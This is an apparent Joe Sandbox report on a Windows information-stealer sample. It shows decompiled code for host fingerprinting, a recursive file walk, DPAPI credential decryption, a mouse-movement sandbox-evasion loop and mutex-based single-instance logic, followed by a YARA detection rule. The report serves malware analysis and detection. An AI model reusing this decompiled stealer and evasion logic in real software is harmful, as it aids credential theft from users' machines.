                                                  						 *((intOrPtr*)(_t50 + 8)) = 0;
                                                  						 *((intOrPtr*)(_t50 + 0xc)) = _t62;
                                                  						if(_t64 != 0x80000002) {
                                                  							__eflags = _t64 - 0x80000003;
                                                  							if(_t64 != 0x80000003) {
                                                  								__eflags = _t64 - 0x80000004;
                                                  								if(__eflags == 0) {
                                                  									_t60 = _v616 + 0x20;
                                                  									goto L7;
                                                  								}
                                                  							} else {
                                                  								_t60 = _v616 + 0x10;
                                                  								goto L7;
                                                  							}
                                                  						} else {
                                                  							_t60 = _v616;
                                                  							L7:
                                                  							_t62 =  &_v608;
                                                  							E00403533(_t60, _t62, 0x10); // 16-byte copy of the four registers into the brand string buffer
                                                  							_t75 = _t75 + 4;
                                                  						}
                                                  						_t64 = _t64 + 1;
                                                  					} while (_t64 <= _v612);
                                                  				}
                                                  				_t34 = GetCurrentHwProfileA( &_v556); // executed
                                                  				_t80 = _t34;
                                                  				if(_t34 != 0) {
                                                  					E004035C3(_t80, 0, "- HWID: %s\r\n",  &(_v556.szHwProfileGuid)); // hardware profile GUID is what the sample calls the HWID
                                                  					_t75 = _t75 + 0xc;
                                                  				}
                                                  				GetSystemInfo( &_v592); // executed
                                                  				_push(_v592.dwNumberOfProcessors); // logical processor count
                                                  				E004035C3(_t80, 0, "- CPU: %s (%d cores)\r\n", _v616); // brand string collected above
                                                  				_t76 = _t75 + 0x10;
                                                  				E0040351E(_v616);
                                                  				_t70 = 0;
                                                  				_t66 = 1;
                                                  				_push(1);
                                                  				_push( &_v428);
                                                  				_push(1);
                                                  				while(1) {
                                                  					_v428 = 0x1a8; // DISPLAY_DEVICEA.cb = sizeof(DISPLAY_DEVICEA) = 424 bytes
                                                  					_t39 = EnumDisplayDevicesA(0, _t66, &_v428, 1); // (lpDevice, iDevNum, lpDisplayDevice, EDD_GET_DEVICE_INTERFACE_NAME); arguments recovered from the surrounding _push() calls, the decompiler showed "??"
                                                  					if(_t39 == 0) {
                                                  						break;
                                                  					}
                                                  					_t40 = _v428;
                                                  					__eflags = _t70 - _t40;
                                                  					if(__eflags != 0) {
                                                  						_push( &_v392); // DISPLAY_DEVICEA.DeviceString (offset 36 into the structure)
                                                  						E004035C3(__eflags, 0, "- VideoAdapter #%d: %s\r\n", _t66);
                                                  						_t40 = _v428;
                                                  						_t76 = _t76 + 0x10;
                                                  					}
                                                  					__eflags = _t70;
                                                  					_push(1);
                                                  					_t70 = (_t70 == 0) ? _t40 : _t70; // conditional move; the decompiler rendered it as "== ?"
                                                  					_t66 = _t66 + 1;
                                                  					__eflags = _t66;
                                                  					_push( &_v428);
                                                  					_push(_t66);
                                                  				}
                                                  				return _t39;
                                                  			}
                                                  Address column (one entry per line of E0040202A above, shown beside the code in the original report): 0x0040202a through 0x00402191; 0x00000000 marks lines with no instruction of their own.

                                                  APIs
                                                    • Part of subcall function 004034F0: EnterCriticalSection.KERNEL32(004084D4,?,?,00403B95,?,0040223F), ref: 004034FA
                                                    • Part of subcall function 004034F0: GetProcessHeap.KERNEL32(00000008,?,?,?,00403B95,?,0040223F), ref: 00403503
                                                    • Part of subcall function 004034F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00403B95,?,0040223F), ref: 0040350A
                                                    • Part of subcall function 004034F0: LeaveCriticalSection.KERNEL32(004084D4,?,?,?,00403B95,?,0040223F), ref: 00403513
                                                  • GetCurrentHwProfileA.ADVAPI32(?), ref: 004020DE
                                                  • GetSystemInfo.KERNELBASE(?,?,?), ref: 00402101
                                                  • EnumDisplayDevicesA.USER32(00000000,00000002,?,00000001), ref: 00402185
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: CriticalHeapSection$AllocateCurrentDevicesDisplayEnterEnumInfoLeaveProcessProfileSystem
                                                  • String ID: - CPU: %s (%d cores)$- HWID: %s$- VideoAdapter #%d: %s
                                                  • API String ID: 1497829079-3876982446
                                                  • Opcode ID: 4e531b95e6d30593aa1aa5d047c0dd94825ffea83d23737851f4064f67ae3138
                                                  • Instruction ID: 3c691ca1110b890ba953a104ca2fe17719c0a808786d04ab18a9e7f71232156c
                                                  • Opcode Fuzzy Hash: 4e531b95e6d30593aa1aa5d047c0dd94825ffea83d23737851f4064f67ae3138
                                                  • Instruction Fuzzy Hash: 4C41D1719083019BD720CF15CC85F6BB7E8EB84714F10893EFA49AB2C1E6759944CBA6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
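Added here as a worked example, not part of the Joe Sandbox report and not code from the sample: a YARA rule built only from the format strings the decompiled functions reference (the ones listed in the "String ID" fields above). The rule name, tag and meta values are my own assumptions, and the rule has not been run against this sample.

```yara
// Added example, not part of the Joe Sandbox report or the analysed sample.
// Strings are taken verbatim from the decompiled functions; rule name, tag and meta are assumptions.
rule win_fileexe_hostinfo_fingerprint : stealer
{
    meta:
        description = "Unpacked 32-bit payload: host fingerprint block (HWID / CPU / VideoAdapter) plus directory-walk format strings"
        source      = "format strings from the decompiled functions E0040202A and E00401D2F"
        scope       = "intended for the memory dump listed under Memory Dump Source (image base 0x400000)"

    strings:
        // E0040202A: fingerprint lines produced through the format-string routine E004035C3
        $fp1 = "- HWID: %s\r\n" ascii
        $fp2 = "- CPU: %s (%d cores)\r\n" ascii
        $fp3 = "- VideoAdapter #%d: %s\r\n" ascii

        // E00401D2F and the FindFirstFileW routine before it: wide-char path patterns and the Telegram marker
        $dir1 = "%s\\*" wide
        $dir2 = "%s\\%s" wide
        $tg   = "Telegram" wide ascii

    condition:
        uint16(0) == 0x5A4D and all of ($fp*) and 2 of ($dir*, $tg)
}
```

Run it with `yara -s <rule file> <dump>` against the process dump rather than the on-disk file, since the strings live in the unpacked 0x400000 image. The `uint16(0) == 0x5A4D` check assumes the dump starts with the PE header ("based on PE: true" above); drop it when scanning a raw memory region. The wide string "Docs" is deliberately left out: E00401D2F assembles it on the stack one character at a time (0x44, 0x6f, 0x63, 0x73), so it never appears as a contiguous string in the image.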

                                                  Control-flow Graph (interactive in the original report; node colour marks Executed vs. Not Executed basic blocks). Exported edge list below, in the form "id start-end [call target] source->successor":
                                                  control_flow_graph 616 401d2f-401d41 617 401d47-401d51 616->617 618 401efb-401f00 616->618 617->618 619 401d57-401d81 call 4035e8 FindFirstFileW 617->619 619->618 622 401d87-401dcb call 4034f0 call 403623 619->622 627 401dd0-401df5 call 403623 * 2 622->627 632 401ed7-401ee5 FindNextFileW 627->632 633 401dfb-401e14 call 4035e8 627->633 634 401ef2-401ef6 call 40351e 632->634 635 401ee7-401eed 632->635 639 401e16-401e26 call 403713 633->639 640 401e47-401e4c 633->640 634->618 635->627 639->640 647 401e28-401e38 call 403713 639->647 641 401ec8-401ed3 640->641 642 401e4e-401e58 640->642 641->632 642->641 644 401e5a-401e67 call 40403b 642->644 650 401ec1-401ec3 call 40351e 644->650 651 401e69-401e80 call 403623 call 403b10 644->651 647->640 655 401e3a-401e3d call 401d2f 647->655 650->641 651->650 661 401e82-401eba call 4035e8 call 403e66 651->661 658 401e42 655->658 658->641 661->650
                                                  C-Code - Quality: 95%
                                                  			E00401D2F(intOrPtr _a4) {
                                                  				struct _WIN32_FIND_DATAW _v596;
                                                  				short _v600;
                                                  				short _v602;
                                                  				short _v604;
                                                  				short _v606;
                                                  				char _v608;
                                                  				signed int _v612;
                                                  				intOrPtr _v616;
                                                  				void* _t38;
                                                  				WCHAR* _t39;
                                                  				intOrPtr _t42;
                                                  				signed int _t43;
                                                  				short _t44;
                                                  				short _t45;
                                                  				short _t46;
                                                  				short _t47;
                                                  				void* _t51;
                                                  				int _t54;
                                                  				WCHAR* _t57;
                                                  				WCHAR* _t65;
                                                  				void* _t75;
                                                  				WCHAR* _t95;
                                                  				WCHAR* _t100;
                                                  				signed int _t101;
                                                  				signed int _t102;
                                                  				void* _t104;
                                                  				void* _t105;
                                                  
                                                  				// Recursive directory walk (self-call at 401e3a in the CFG): lists "<path>\*" for the path held at 0x4084f4,
                                                  				// builds the wide string "Docs" on the stack, and formats "<path>\<name>" for entries that fit in MAX_PATH.
                                                  				_t104 = (_t102 & 0xfffffff8) - 0x268;
                                                  				if(_a4 == 0) {
                                                  					L19:
                                                  					return _t38;
                                                  				}
                                                  				_t107 =  *0x40802c - 0x81f39c19;
                                                  				if( *0x40802c == 0x81f39c19) { // returns early when the global dword at 0x40802c equals 0x81f39c19
                                                  					goto L19;
                                                  				}
                                                  				_t39 =  *0x4084f4; // 0xf7ed80
                                                  				E004035E8(_t107, _t39, L"%s\\*", _t39); // rewrite the path buffer in place as "<path>\*" (search pattern)
                                                  				_t105 = _t104 + 0xc;
                                                  				_t38 = FindFirstFileW( *0x4084f4,  &_v596); // executed
                                                  				_t75 = _t38;
                                                  				if(_t75 != 0xffffffff) {
                                                  					_t42 = E004034F0(0x208); // heap allocation (RtlAllocateHeap wrapper, see APIs above); 0x208 bytes = MAX_PATH wide characters
                                                  					_t100 =  *0x4084f4; // 0xf7ed80
                                                  					_v616 = _t42;
                                                  					_t43 = E00403623(_t100); // wide-string length in characters
                                                  					 *((short*)(_t100 + _t43 * 2 - 4)) = 0; // cut the trailing "\*" off again, leaving "<path>"
                                                  					_t44 = 0x44; // build the wide string L"Docs" on the stack one character at a time: 'D'
                                                  					_v608 = _t44;
                                                  					_t45 = 0x6f; // 'o'
                                                  					_v606 = _t45;
                                                  					_t46 = 0x63; // 'c'
                                                  					_v604 = _t46;
                                                  					_t47 = 0x73; // 's'
                                                  					_v602 = _t47;
                                                  					_v600 = 0; // terminator
                                                  					while(1) {
                                                  						_v612 = E00403623(_t100) & 0x0000ffff;
                                                  						_t51 = E00403623( &(_v596.cFileName));
                                                  						_t110 = _t51 + _v612 + 3 - 0x104;
                                                  						if(_t51 + _v612 + 3 < 0x104) {
                                                  							_push( &(_v596.cFileName));
                                                  							E004035E8(_t110, _t100, L"%s\\%s", _t100);
                                                  							_t105 = _t105 + 0x10;
                                                  							if((_v596.dwFileAttributes & 0x00000010) == 0 || E00403713( &(_v596.cFileName), L"..") == 0 || E00403713( &(_v596.cFileName), ".") == 0) {
                                                  								__eflags = _v596.dwFileAttributes & 0x000000a7;
                                                  								if((_v596.dwFileAttributes & 0x000000a7) != 0) {
                                                  									__eflags = _v596.nFileSizeLow - 1 - 0x1e847e;
                                                  									if(__eflags <= 0) {
                                                  										_t101 = E0040403B( &(_v596.cFileName), __eflags);
                                                  										__eflags = _t101;
                                                  										if(_t101 != 0) {
                                                  											__eflags = E00403B10(_t101, E00403623(_t101) + _t62) - 0xc4a9daf5;
                                                  											if(__eflags == 0) {
                                                  												_t65 =  *0x4084f4; // 0xf7ed80
                                                  												_push( &(_t65[ *0x4084f8 & 0x0000ffff]));
                                                  												E004035E8(__eflags, _v616, L"%s%s",  &_v608);
                                                  												_t95 =  *0x4084f4; // 0xf7ed80
                                                  												E00403E66(_a4, _t95, __eflags, _v616);
                                                  												_t105 = _t105 + 0x14;
                                                  												 *0x4084fc =  *0x4084fc + 1;
                                                  												__eflags =  *0x4084fc;
                                                  											}
                                                  										}
                                                  										E0040351E(_t101);
                                                  									}
                                                  								}
                                                  							} else {
                                                  								E00401D2F(_a4); // executed
                                                  							}
                                                  							_t57 =  *0x4084f4; // 0xf7ed80
                                                  							_t57[_v612] = 0;
                                                  						}
                                                  						_t54 = FindNextFileW(_t75,  &_v596); // executed
                                                  						if(_t54 == 0) {
                                                  							break;
                                                  						}
                                                  						_t100 =  *0x4084f4; // 0xf7ed80
                                                  					}
                                                  					_t38 = E0040351E(_v616);
                                                  				}
                                                  			}

                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?), ref: 00401D76
                                                    • Part of subcall function 004034F0: EnterCriticalSection.KERNEL32(004084D4,?,?,00403B95,?,0040223F), ref: 004034FA
                                                    • Part of subcall function 004034F0: GetProcessHeap.KERNEL32(00000008,?,?,?,00403B95,?,0040223F), ref: 00403503
                                                    • Part of subcall function 004034F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00403B95,?,0040223F), ref: 0040350A
                                                    • Part of subcall function 004034F0: LeaveCriticalSection.KERNEL32(004084D4,?,?,?,00403B95,?,0040223F), ref: 00403513
                                                  • FindNextFileW.KERNELBASE(00000000,?), ref: 00401EDD
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: CriticalFileFindHeapSection$AllocateEnterFirstLeaveNextProcess
                                                  • String ID: %s%s$%s\%s$%s\*
                                                  • API String ID: 3555643018-2064654797
                                                  • Opcode ID: 440ed711fed2fb8f36dd8926b704fde87bff727aee1fae3d6b04d351973b976a
                                                  • Instruction ID: 650e7d6a7c76fb24c6780d963a35dd922da22983f4b97d23ba0b1c2adfca54df
                                                  • Opcode Fuzzy Hash: 440ed711fed2fb8f36dd8926b704fde87bff727aee1fae3d6b04d351973b976a
                                                  • Instruction Fuzzy Hash: 9B419F716082419BC714EF25DD41A2F77E8AF84305F10493FFD81A72E2EB39AA05879E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 666 401c87-401cc2 call 40439a 669 401d22-401d2e 666->669 670 401cc4-401ceb call 40355e CryptUnprotectData 666->670 673 401cf8-401cfd 670->673 674 401ced-401cf6 670->674 673->669 675 401cff-401d1c CryptProtectData 673->675 674->669 675->669
                                                  APIs
                                                    • Part of subcall function 0040439A: GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,004044D8), ref: 004043AC
                                                    • Part of subcall function 0040439A: LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,004044D8), ref: 004043B9
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00401CE6
                                                  • CryptProtectData.CRYPT32(?,?,00000000,00000000,00000000,00000000,?), ref: 00401D1C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: CryptData$HandleLibraryLoadModuleProtectUnprotect
                                                  • String ID: CRYPT32.dll$Poverty is the parent of crime.
                                                  • API String ID: 3642467563-1885057629
                                                  • Opcode ID: e00161306afa63e9811d6efb7f220ced9919129b07580ee552478133f7538944
                                                  • Instruction ID: b6cfde3746927ffec1bbe8d416cc9fc3ff119c27af47a0e536ab53ab403d3b37
                                                  • Opcode Fuzzy Hash: e00161306afa63e9811d6efb7f220ced9919129b07580ee552478133f7538944
                                                  • Instruction Fuzzy Hash: 88115CB5D0020DABDB10DF99C8819EFBBBCEF48314F50456AE945B3240E774AE09CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 676 402192-4021a4 GetCursorPos 677 4021a6 676->677 678 4021a8-4021b1 676->678 679 4021df-4021e2 677->679 680 4021b4-4021b7 678->680 680->679 681 4021b9-4021c9 GetCursorPos 680->681 682 4021d3 681->682 683 4021cb-4021d1 681->683 682->679 683->682 684 4021d5-4021dd Sleep 683->684 684->680
                                                  C-Code - Quality: 68%
                                                  			E00402192() {
                                                  				long _v8;
                                                  				intOrPtr _v12;
                                                  				struct tagPOINT _v20;
                                                  				int _t12;
                                                  				long _t19;
                                                  
                                                  				_t12 = GetCursorPos( &_v20);
                                                  				if(_t12 == 0) {
                                                  					return _t12;
                                                  				}
                                                  				_v8 = _v20.x;
                                                  				_t4 =  &(_v20.y); // 0x40227e
                                                  				_v12 =  *_t4;
                                                  				while(1 != 0) {
                                                  					GetCursorPos( &_v20);
                                                  					_t19 = _v20.x;
                                                  					if(_t19 != _v8) {
                                                  						L6:
                                                  						return _t19;
                                                  					}
                                                  					_t9 =  &(_v20.y); // 0x40227e
                                                  					_t19 =  *_t9;
                                                  					if(_t19 != _v12) {
                                                  						goto L6;
                                                  					}
                                                  					Sleep(0x64); // executed
                                                  				}
                                                  				return 1;
                                                  			}

                                                  APIs
                                                  • GetCursorPos.USER32(?,?,0040227E), ref: 0040219C
                                                  • GetCursorPos.USER32(?,?,0040227E), ref: 004021BD
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: Cursor
                                                  • String ID: ~"@
                                                  • API String ID: 3268636600-1883282424
                                                  • Opcode ID: a911841c05d4c3f65ddbd01571e903946c400258c72f5d3a3787f254ffcd9395
                                                  • Instruction ID: 77f77d783b28b98305d308f0ddaeab0996e441ebfdf2e17e4645b00e22eb7271
                                                  • Opcode Fuzzy Hash: a911841c05d4c3f65ddbd01571e903946c400258c72f5d3a3787f254ffcd9395
                                                  • Instruction Fuzzy Hash: 62F0BD31D04209EBCB10DFA4CA499AEB7B9AB04300F5045A6EA15F72C0E778AA418B5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 709 40351e-403520 710 403532 709->710 711 403522-40352c GetProcessHeap RtlFreeHeap 709->711 711->710
                                                  C-Code - Quality: 100%
                                                  			E0040351E(void* __ecx) {
                                                  				void* _t1;
                                                  				char _t3;
                                                  
                                                  				if(__ecx != 0) {
                                                  					_t3 = RtlFreeHeap(GetProcessHeap(), 0, __ecx); // executed
                                                  					return _t3;
                                                  				}
                                                  				return _t1;
                                                  			}

                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00403026,?,?,?,?,?,?,?,?,?,?,?,004035DC,?), ref: 00403525
                                                  • RtlFreeHeap.NTDLL(00000000,?,?,?,?,?,?,?,?,?,?,?,004035DC,?,00000400,?), ref: 0040352C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: Heap$FreeProcess
                                                  • String ID:
                                                  • API String ID: 3859560861-0
                                                  • Opcode ID: 5a814851b518f180a18ac01642816ee6c1d3c3ca3fd15fd3dc1afb4df2b2407a
                                                  • Instruction ID: 6f93d42a4c34445aa6580dae24056dbfe0e0501b0f68dafdb57af497b5c344e4
                                                  • Opcode Fuzzy Hash: 5a814851b518f180a18ac01642816ee6c1d3c3ca3fd15fd3dc1afb4df2b2407a
                                                  • Instruction Fuzzy Hash: 44B092B0989100AAEE085BA0AE2DB2B29189B00303F408A68B106B02A086786900863A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 90%
                                                  			_entry_() {
                                                  				signed int _v5;
                                                  				signed char _v6;
                                                  				signed char _v7;
                                                  				WCHAR* _v12;
                                                  				char _v13;
                                                  				char _v14;
                                                  				char _v15;
                                                  				char _v16;
                                                  				char _v17;
                                                  				char _v18;
                                                  				char _v19;
                                                  				char _v20;
                                                  				char _v24;
                                                  				char _v25;
                                                  				char _v26;
                                                  				char _v27;
                                                  				char _v28;
                                                  				char _v29;
                                                  				char _v30;
                                                  				char _v31;
                                                  				char _v32;
                                                  				signed int _v40;
                                                  				void _v44;
                                                  				signed int _v48;
                                                  				signed int _v52;
                                                  				signed int _v56;
                                                  				char _v60;
                                                  				intOrPtr _v64;
                                                  				void* _v68;
                                                  				void* _v72;
                                                  				void* _v76;
                                                  				void* _v80;
                                                  				intOrPtr _v352;
                                                  				intOrPtr _v356;
                                                  				intOrPtr _v360;
                                                  				void _v364;
                                                  				void* __esi;
                                                  				signed int _t92;
                                                  				signed int _t93;
                                                  				signed int _t96;
                                                  				signed char _t100;
                                                  				signed char _t112;
                                                  				signed char _t115;
                                                  				signed int _t118;
                                                  				signed int _t119;
                                                  				signed int _t120;
                                                  				signed int _t122;
                                                  				signed int _t124;
                                                  				signed int _t126;
                                                  				signed int _t128;
                                                  				signed int _t130;
                                                  				void* _t133;
                                                  				void* _t135;
                                                  				void* _t137;
                                                  				void* _t139;
                                                  				signed int _t152;
                                                  				signed int _t157;
                                                  				signed char _t159;
                                                  				signed int _t160;
                                                  				signed int _t161;
                                                  				intOrPtr _t167;
                                                  				signed int _t171;
                                                  				intOrPtr _t179;
                                                  				signed int _t180;
                                                  				signed int _t181;
                                                  				signed int _t182;
                                                  				signed int _t188;
                                                  				signed int _t189;
                                                  				signed int _t190;
                                                  				intOrPtr _t202;
                                                  				void* _t204;
                                                  				void* _t221;
                                                  				void* _t223;
                                                  				void* _t224;
                                                  
                                                  				_t90 = InitializeCriticalSectionAndSpinCount(0x4084d4, 0xda3);
                                                  				if(_t90 != 0) {
                                                  					_t90 = CreateMutexA(0, 0, "e9ad4a13-a667-4534-bcfa-4791968c5e00"); // executed
                                                  					_v52 = _t90;
                                                  					__eflags = _v52;
                                                  					if(_v52 == 0) {
                                                  						L34:
                                                  						ExitProcess(0); // executed
                                                  					}
                                                  					__eflags = GetLastError() - 0xb7;
                                                  					if(__eflags == 0) {
                                                  						goto L34;
                                                  					}
                                                  					_t204 = 0x65;
                                                  					E00403B82( &_v44, _t204, __eflags);
                                                  					__eflags = _v40;
                                                  					if(_v40 == 0) {
                                                  						L33:
                                                  						DeleteCriticalSection(0x4084d4);
                                                  						_t92 = 2;
                                                  						_t93 = _t92 << 1;
                                                  						__eflags = _t93;
                                                  						_t87 = _t93 + 0x4084c0; // 0xf0006
                                                  						_t167 =  *0x4080b4; // 0xed0000
                                                  						 *(_t167 + 1) =  *_t87 & 0x0000ffff;
                                                  						_t90 =  *0x4080b4(_v52);
                                                  						goto L34;
                                                  					}
                                                  					E0040355E( &_v364, 0, 0x11c);
                                                  					_v364 = 0x11c;
                                                  					_t96 = E004044AC( &_v364, _t221); // executed
                                                  					__eflags = _t96;
                                                  					if(_t96 < 0) {
                                                  						goto L33;
                                                  					}
                                                  					E00402192(); // executed
                                                  					_push(_v352);
                                                  					_push(_v356);
                                                  					E004035C3(__eflags, 0, "- OperationSystem: %d:%d:%d\r\n", _v360); // executed
                                                  					_t171 = 0x47;
                                                  					memcpy(_t224 + 0x14 - 0x11c,  &_v364, _t171 << 2);
                                                  					_t100 = E00404511(); // executed
                                                  					__eflags = (_t100 & 0x000000ff) - 1;
                                                  					if((_t100 & 0x000000ff) != 1) {
                                                  						goto L33;
                                                  					}
                                                  					 *0x4084ec = E004034F0(0x208);
                                                  					 *0x4084cc = E004034F0(0x208);
                                                  					 *0x4084f4 = E004034F0(0x208);
                                                  					__eflags =  *0x4084ec;
                                                  					if( *0x4084ec == 0) {
                                                  						L29:
                                                  						E00403D26( &_v44, L"$d.log",  *0x408500,  *0x408504); // executed
                                                  						_t179 =  *0x408500; // 0x8b83020
                                                  						E0040351E(_t179);
                                                  						_t180 =  *0x4084f4; // 0xf7ed80
                                                  						E0040351E(_t180);
                                                  						_t181 =  *0x4084cc; // 0xf7eb70
                                                  						E0040351E(_t181);
                                                  						_t182 =  *0x4084ec; // 0xf7e960
                                                  						E0040351E(_t182);
                                                  						_v64 = E00403BAB( &_v44);
                                                  						E00402192(); // executed
                                                  						while(1) {
                                                  							_t112 = E00405002(_v40, _v64); // executed
                                                  							__eflags = _t112 & 0x000000ff;
                                                  							if((_t112 & 0x000000ff) != 0) {
                                                  								break;
                                                  							}
                                                  						}
                                                  						E0040351E(_v40);
                                                  						goto L33;
                                                  					}
                                                  					__eflags =  *0x4084cc;
                                                  					if( *0x4084cc == 0) {
                                                  						goto L29;
                                                  					}
                                                  					__eflags =  *0x4084f4;
                                                  					if( *0x4084f4 == 0) {
                                                  						goto L29;
                                                  					}
                                                  					_v20 = 0x73;
                                                  					_v19 = 0x68;
                                                  					_v18 = 0x65;
                                                  					_v17 = 0x6c;
                                                  					_v16 = 0x6c;
                                                  					_v15 = 0x33;
                                                  					_v14 = 0x32;
                                                  					_v13 = 0;
                                                  					_v60 = 0xc7652b3f;
                                                  					_v56 = _v56 & 0x00000000;
                                                  					_t207 =  &_v60;
                                                  					_t25 =  &_v20; // 0x73, executed
                                                  					_t115 = E0040439A(_t25,  &_v60); // executed
                                                  					__eflags = (_t115 & 0x000000ff) - 1;
                                                  					if((_t115 & 0x000000ff) != 1) {
                                                  						goto L29;
                                                  					}
                                                  					E00401F03(); // executed
                                                  					_t118 = 4;
                                                  					_t119 = _t118 * 0;
                                                  					__eflags =  *((intOrPtr*)(_t119 + 0x40802c)) - 0x81f39c19;
                                                  					if( *((intOrPtr*)(_t119 + 0x40802c)) != 0x81f39c19) {
                                                  						L14:
                                                  						_t120 = 4;
                                                  						_t122 =  *((intOrPtr*)(_t223 + _t120 * 0 - 0x38))(0, 0x1c, 0, 0,  *0x4084cc);
                                                  						__eflags = _t122;
                                                  						if(_t122 >= 0) {
                                                  							_t188 =  *0x4084cc; // 0xf7eb70
                                                  							 *0x4084d0 = E00403623(_t188);
                                                  							_t124 = 4;
                                                  							_t126 =  *((intOrPtr*)(_t223 + _t124 * 0 - 0x38))(0, 0, 0, 0,  *0x4084f4);
                                                  							__eflags = _t126;
                                                  							if(_t126 >= 0) {
                                                  								_t189 =  *0x4084f4; // 0xf7ed80
                                                  								 *0x4084f8 = E00403623(_t189);
                                                  								_t128 = 4;
                                                  								_t130 =  *((intOrPtr*)(_t223 + _t128 * 0 - 0x38))(0, 0x1a, 0, 0,  *0x4084ec);
                                                  								__eflags = _t130;
                                                  								if(_t130 >= 0) {
                                                  									_t190 =  *0x4084ec; // 0xf7e960
                                                  									 *0x4084f0 = E00403623(_t190);
                                                  									_t133 = CreateThread(0, 0, E004019CF,  &_v44, 0, 0); // executed
                                                  									_v80 = _t133;
                                                  									_t135 = CreateThread(0, 0, E00404E34,  &_v44, 0, 0); // executed
                                                  									_v76 = _t135;
                                                  									_t137 = CreateThread(0, 0, E00401D2F,  &_v44, 0, 0); // executed
                                                  									_v72 = _t137;
                                                  									_t139 = CreateThread(0, 0, E00404868,  &_v44, 0, 0); // executed
                                                  									_v68 = _t139;
                                                  									WaitForMultipleObjects(4,  &_v80, 1, 0xffffffff); // executed
                                                  									E0040202A(_t207); // executed
                                                  									_v5 = 0;
                                                  									while(1) {
                                                  										__eflags = (_v5 & 0x000000ff) - 3;
                                                  										if((_v5 & 0x000000ff) >= 3) {
                                                  											break;
                                                  										}
                                                  										_t157 = _v5 & 0x000000ff;
                                                  										__eflags =  *((intOrPtr*)(_t223 + _t157 * 4 - 0x4c)) - 0xffffffff;
                                                  										if( *((intOrPtr*)(_t223 + _t157 * 4 - 0x4c)) != 0xffffffff) {
                                                  											_t160 = 2;
                                                  											_t161 = _t160 << 0;
                                                  											__eflags = _t161;
                                                  											_t60 = _t161 + 0x4084c0; // 0xf0006
                                                  											_t202 =  *0x4080b4; // 0xed0000
                                                  											 *(_t202 + 1) =  *_t60 & 0x0000ffff;
                                                  											 *0x4080b4( *((intOrPtr*)(_t223 + (_v5 & 0x000000ff) * 4 - 0x4c))); // executed
                                                  										}
                                                  										_t159 = _v5 + 1;
                                                  										__eflags = _t159;
                                                  										_v5 = _t159;
                                                  									}
                                                  									E00404ECE(0x4084fc, 2);
                                                  									E00404ECE(0x4084ca, 1);
                                                  									_v6 = 0x40;
                                                  									E00404ECE( &_v6, 1);
                                                  									E00404ECE(0x408063, _v6 & 0x000000ff);
                                                  									_v7 = 0x24;
                                                  									E00404ECE( &_v7, 1);
                                                  									E00404ECE("e9ad4a13-a667-4534-bcfa-4791968c5e00", _v7 & 0x000000ff);
                                                  									_v12 = E004034F0(0x208);
                                                  									__eflags = _v12;
                                                  									if(_v12 != 0) {
                                                  										GetModuleFileNameW(0, _v12, 0x208);
                                                  									}
                                                  									_t152 = E00403623(_v12) << 1;
                                                  									__eflags = _t152;
                                                  									_v48 = _t152;
                                                  									E00404ECE( &_v48, 2);
                                                  									E00404ECE(_v12, _v48);
                                                  									E0040351E(_v12);
                                                  									goto L29;
                                                  								}
                                                  								ExitProcess(0);
                                                  							}
                                                  							ExitProcess(0);
                                                  						}
                                                  						ExitProcess(0);
                                                  					}
                                                  					_v32 = 0x6b;
                                                  					_v31 = 0x65;
                                                  					_v30 = 0x72;
                                                  					_v29 = 0x6e;
                                                  					_v28 = 0x65;
                                                  					_v27 = 0x6c;
                                                  					_v26 = 0x33;
                                                  					_v25 = 0x32;
                                                  					_v24 = 0;
                                                  					_t207 = 0x40802c;
                                                  					_t36 =  &_v32; // 0x6b
                                                  					_t90 = E0040439A(_t36, 0x40802c) & 0x000000ff;
                                                  					__eflags = _t90 - 2;
                                                  					if(_t90 == 2) {
                                                  						goto L14;
                                                  					}
                                                  					L35:
                                                  					return _t90;
                                                  				}
                                                  				goto L35;
                                                  			}

                                                  APIs
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(004084D4,00000DA3), ref: 004021F8
                                                  • CreateMutexA.KERNELBASE(00000000,00000000,e9ad4a13-a667-4534-bcfa-4791968c5e00), ref: 00402210
                                                  • GetLastError.KERNEL32 ref: 00402223
                                                  Strings
                                                  Memory Dump Source
